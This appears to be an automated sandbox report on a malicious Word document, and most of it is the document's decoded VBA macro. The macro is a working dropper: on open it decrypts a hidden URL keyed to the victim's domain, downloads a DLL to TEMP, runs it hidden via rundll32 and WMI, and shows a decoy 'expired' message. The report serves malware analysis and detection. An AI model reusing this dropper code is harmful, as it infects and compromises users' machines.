MALICIOUS
Risk Score: 538

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
- T1055.012 Process Hollowing

The sample is a malicious Office document containing obfuscated VBA macros. Critical heuristics indicate the VBA code attempts to download and write a file to disk, likely a second-stage payload, using HTTP and then execute it via CreateRemoteThread and WriteProcessMemory. The presence of an Auto_Open macro and the use of CreateObject and Shell functions further support this malicious intent. The specific malware family could not be confidently identified.

Heuristics (15)

- ClamAV: Doc.Malware.Chronos-6897935-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
- Reference to WriteProcessMemory API (critical, SC_STR_WRITEPROCESSMEMORY): Reference to WriteProcessMemory API
- Reference to CreateRemoteThread API (critical, SC_STR_CREATEREMOTETHREAD): Reference to CreateRemoteThread API
- VBA macros detected (medium, OLE_VBA_MACROS, 7 related findings): Document contains VBA macro code
- VBA downloads and writes a file to disk (critical, OLE_VBA_HTTP_DROP_EXEC): VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script: `dollop.Write ampleMacarons.responseBody`
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script: `Set ampleMacarons = CreateObject(StrReverse("PTTHLMX.tfosorciM"))`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
  Matched line in script: `Set ampleMacarons = CreateObject(StrReverse("PTTHLMX.tfosorciM"))`
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
  Matched line in script: `Set objWMIService = GetObject(strGetObject)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched line in script: `Sub AutoOpen()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
  Matched line in script: `keyVar = UCase(Environ("USERDNSDOMAIN"))`
- Reference to CreateProcess API (high, SC_STR_CREATEPROCESS): Reference to CreateProcess API
- Reference to VirtualAlloc API (medium, SC_STR_VIRTUALALLOC): Reference to VirtualAlloc API
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main (Referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (Referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (Referenced by macro)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34349 bytes |

SHA-256: a079740a3470f0b2d1e63108d66e0cf9afcfbc39714e08dd5839c6fe56ca8144

Preview script: first 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const namePrefix = "oegaid"
Private Const nameSuffix = ".dll"
Private Const clOneMask = 16515072
Private Const clTwoMask = 258048
Private Const clThreeMask = 4032
Private Const clFourMask = 63
Private Const clHighMask = 16711680
Private Const clMidMask = 65280
Private Const clLowMask = 255
Private Const cl2Exp18 = 262144
Private Const cl2Exp12 = 4096
Private Const cl2Exp6 = 64
Private Const cl2Exp8 = 256
Private Const cl2Exp16 = 65536
Private crc32Table() As Long
Public Function Decode64(ByVal sString As String) As Byte()
Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
Dim lTemp As Long
sString = Replace(sString, vbCr, vbNullString)
sString = Replace(sString, vbLf, vbNullString)
lTemp = Len(sString) Mod 4
If lTemp Then
Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")
End If
If InStrRev(sString, "==") Then
iPad = 2
ElseIf InStrRev(sString, "=") Then
iPad = 1
End If
For lTemp = 0 To 255
Select Case lTemp
Case 65 To 90
bTrans(lTemp) = lTemp - 65
Case 97 To 122
bTrans(lTemp) = lTemp - 71
Case 48 To 57
bTrans(lTemp) = lTemp + 4
Case 43
bTrans(lTemp) = 62
Case 47
bTrans(lTemp) = 63
End Select
Next lTemp
For lTemp = 0 To 63
lPowers6(lTemp) = lTemp * cl2Exp6
lPowers12(lTemp) = lTemp * cl2Exp12
lPowers18(lTemp) = lTemp * cl2Exp18
Next lTemp
bIn = StrConv(sString, vbFromUnicode)
ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)
For lChar = 0 To UBound(bIn) Step 4
lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))
lTemp = lQuad And clHighMask
bOut(lPos) = lTemp \ cl2Exp16
lTemp = lQuad And clMidMask
bOut(lPos + 1) = lTemp \ cl2Exp8
bOut(lPos + 2) = lQuad And clLowMask
lPos = lPos + 3
Next lChar
If iPad Then
ReDim Preserve bOut(UBound(bOut) - iPad)
End If
Decode64 = bOut
End Function
Function StringToBytes(ByVal str As Variant) As Byte()
Dim retVal() As Byte
Dim tmp() As String
Dim k As Integer
tmp = Split(StrConv(str, vbUnicode), vbNullChar)
k = UBound(tmp) - 1
ReDim Preserve retVal(k)
For i = 0 To (UBound(tmp) - 1)
retVal(i) = Asc(tmp(i))
Next
StringToBytes = retVal
End Function
Function BytesToString(bArray As Variant) As String
Dim i As Integer
For i = 0 To UBound(bArray)
BytesToString = BytesToString & Chr(bArray(i))
Next
End Function
Private Sub Class_initialize()
Dim dwPolynomial As Long
dwPolynomial = &HEDB88320
Dim i As Integer, j As Integer
ReDim crc32Table(256)
Dim dwCrc As Long
For i = 0 To 255
dwCrc = i
For j = 8 To 1 Step -1
If (dwCrc And 1) Then
dwCrc = ((dwCrc And &HFFFFFFFE) \ 2&) And &H7FFFFFFF
dwCrc = dwCrc Xor dwPolynomial
Else
dwCrc = ((dwCrc And &HFFFFFFFE) \ 2&) And &H7FFFFFFF
End If
Next j
crc32Table(i) = dwCrc
Next i
End Sub
Function CRC32(ByRef Buffer() As Byte) As Long
Class_initialize
Dim crc32Result As Long
crc32Result = &HFFFFFFFF
Dim i As Integer
Dim iLookup As Integer
For Each x In Buffer
iLookup = (crc32Result And &HFF) Xor x
crc32Result = ((crc32Result And &HFFFFFF00) \ &H100) _
And 16777215
crc32Result = crc32Result Xor crc32Table(iLookup)
Next
CRC32 = Not (crc32Result)
End Function
Function XorDecodeBytes(iKey As Variant, iMessage As Variant) As Byte()
Dim i, j, k, iKeyIndex As Integer
Dim iTmpKey() As Variant
Dim cfc As Integer
cfc = &HEE
Dim retVal() As Byte
k = UBound(iMessage)
ReDim retVal(k)
For i = 0 To UBound(iMessage)
retVal(i) = iMessage(i)
Next
For i = 0 To UBound(iMessage)
iKeyIndex = i Mod (UBound(iKey) + 1)
j = (iKey(iKeyIndex) Xor iMessage(i)) Xor cfc
cfc = iMessage(i)
retVal(i) = j
Next
XorDecodeBytes = retVal
End Function
Function Slice1DArray(ByRef source() As Byte, ByVal start As Integer, Optional ByVal toend As Integer = -1) As Byte()
Dim retVal() As Byte
Dim length As Integer
Dim i As Integer
If toend = -1 Then
length = UBound(source) - start
toend = UBound(source)
Else
length = toend - start
End If
ReDim retVal(length)
For i = start To toend
retVal(i - start) = source(i)
Next
Slice1DArray = retVal
End Function
Function XorDecryptAndVerifyCRC(ByRef iKey As Variant, iMessage As Variant) As Byte()
Dim candidate_bytes() As Byte
Dim sPlaintext As String
Dim bPlaintext() As Byte
Dim crcRecoveredValue As Long
Dim s As String
candidate_bytes = XorDecodeBytes(iKey, iMessage)
sPlaintext = BytesToString(candidate_bytes)
On Error GoTo Error
s = BytesToString(iKey)
i = InStr(sPlaintext, " ")
If i = 0 Then
GoTo Error
End If
s = Left(sPlaintext, i)
For j = 1 To Len(s) - 1
c = Mid(s, j, 1)
If InStr("-0123456789", c) = 0 Then
GoTo Error
End If
Next
crcRecoveredValue = CLng((Left(sPlaintext, i)))
bPlaintext = Slice1DArray(candidate_bytes, i)
x = CRC32(bPlaintext)
If crcRecoveredValue = CRC32(bPlaintext) Then
XorDecryptAndVerifyCRC = bPlaintext
Return
End If
Error:
End Function
Function ExpandDotString(ByVal sInput As String) As String()
Dim retVal() As String
Dim chunks() As String
Dim k, i As Integer
ReDim retVal(0)
retVal(0) = sInput
Dim current_chunk As String
Dim last_concat As String
k = 0
chunks = Split(sInput, ".")
last_concat = ""
For i = UBound(chunks) To LBound(chunks) Step -1
current_chunk = chunks(i)
If last_concat = "" Then
last_concat = current_chunk
k = k + 1
ReDim Preserve retVal(k)
retVal(k) = current_chunk
GoTo Loop1
Else
ReDim Preserve retVal(k + 2)
retVal(k + 1) = current_chunk
last_concat = current_chunk & "." & last_concat
retVal(k + 2) = last_concat
k = k + 2
End If
Loop1:
Next
ExpandDotString = retVal
End Function
Function TryAllKeys(ByVal sInput As String, ByRef sKeys As Variant) As Byte()
Dim candidates() As String
Dim c As Variant
candidates = ExpandDotString(sInput)
For Each k In sKeys
For Each c In candidates
'
TryAllKeys = XorDecryptAndVerifyCRC(StringToBytes(c), k)
If (Not Not TryAllKeys) <> 0 Then
Exit Function
End If
Next c
Next k
Err.Raise vbObjectError + 555, "TryAllkeys", "Master key not found :/"
End Function
Public Sub ReThrowError(ByRef objError As ErrObject)
' Raise
Err.Raise objError.Number, objError.source, objError.Description, objError.HelpFile, objError.HelpContext
End Sub
Sub RunMe()
Dim s, keyVar, sPlaintext As String
Dim masterKey As Variant
keyVar = UCase(Environ("USERDNSDOMAIN"))
Dim payload As String
payload = ""
Dim i As Integer
Dim keyScheduleBytes() As Variant
Dim myURL As String
Dim keySchedule(4) As String
keySchedule(0) = "kO2U8of+kuaH8Y3px7Hb6se30qbYuZn52vCC/Q=="
keySchedule(1) = "kOCW4Z78hfqN95b32qnX5sa5zbPWoon/0OeQ7A=="
keySchedule(2) = "kOyH+Zjkj/OT6Yjl1a/P4NKuzbPWrpjn1v+a5Q=="
keySchedule(3) = "kO2U8of+kuaH4538yrrB99Ow06zbu5nj1fSQ8Q=="
keySchedule(4) = "jv6f4ZL6j/+V75zly73X+Niwzb/QqIznyO2C/Q=="
payload = payload & "tbC04rWwsri8qaTi9OClreH5vai+ofm4/a2p6ejkv///5ra7t6mpqK6o4Oew"
payload = payload & "5+n2pqKi8Ly4vb+wqPz3ovPqraD2sKavseW57Kyk8//vqrW16769r7HAt8W5"
payload = payload & "iPPe9IP9s8C8nanVoN2/2ZHgy+me/7Lhvbyl"
ReDim keyScheduleBytes(UBound(keySchedule))
For i = 0 To UBound(keySchedule)
keyScheduleBytes(i) = Decode64(keySchedule(i))
Next
masterKey = TryAllKeys(keyVar, keyScheduleBytes)
ciphertext = Decode64(payload)
bPlaintext = XorDecryptAndVerifyCRC(masterKey, ciphertext)
sPlaintext = BytesToString(bPlaintext)
zzz = sPlaintext
Dim ampleMacarons
Dim bStrm
Dim filename
Set ampleMacarons = CreateObject(StrReverse("PTTHLMX.tfosorciM"))
ampleMacarons.Open "GET", zzz, False
ampleMacarons.Send
Set dollop = CreateObject(StrReverse("maertS.bdodA"))
dollop.Type = 1
dollop.Open
dollop.Write ampleMacarons.responseBody
dstPath = Environ$("TEMP") & "\" & namePrefix & "_" & DateDiff("s", #1/1/1970#, Now()) & nameSuffix
savePath = dstPath
dollop.savetofile savePath, 2
Const HIDDEN_WINDOW = 0
strComputer = "."
abc = StrReverse("23lldnur") & " " & dstPath & ",Start"
strGetObject = StrReverse("2vmic\toor\.\\:stmgmniw")
Set objWMIService = GetObject(strGetObject)
Set objStartup = objWMIService.Get(StrReverse("putratSssecorP_23niW"))
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject(strGetObject & StrReverse("ssecorP_23niW:"))
objProcess.Create abc, Null, objConfig, intProcessID
MsgBox ("This document has expired. Please contact the sender.")
End Sub
Sub AutoOpen()
RunMe
End Sub
Attribute VB_Name = "NewMacros"
' Processing file: /tmp/qstore_kvv_xoyp
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 31481 bytes
…